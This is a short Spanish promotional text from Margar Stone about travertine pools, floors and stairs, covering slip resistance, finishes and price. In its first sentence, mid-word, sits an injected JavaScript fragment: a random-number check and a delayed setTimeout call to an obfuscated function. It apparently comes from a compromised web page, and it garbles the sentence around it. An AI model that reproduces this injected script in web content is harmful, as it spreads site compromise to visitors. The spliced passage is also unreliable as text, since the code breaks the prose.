La empresa Margar Stone, aprovechandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando los ensayos  antideslizante que posee , posiciona su gama de piscinas en piedra natural  junto con sus suelos en travertino dentro del mercado de  exteriores de sus obras.

Además de cumplir la normativa clase 3 , posee una ficha técnica que la hace una de las piedras naturales más resistentes, sobre todo en la soluciones de suelos de piedra.

El acabado de la mismas superficie, puede ser un acabado en el mismo  mármol envejecido , apomazado o travertino al corte (travertino natural)

Una  de las alternativas que se toma a la hora de definir la obra, es incorporar en el mismo proyecto aparte de la piscina en travertino  junto  con los suelos  en el mismo mármol, introducir también las zonas de escaleras  en el mismo material, consiguiendo no tener cortes visuales en la misma superficie.

Lo importante en un material natural como puede ser el travertino, es la sencillez a la hora de combinar con otros complementos en obra, en este caso el césped.

 

 

A la hora de compara precios de travertino  en un formato estándar, puede llegar a ser más económico que cualquier sustitutivo.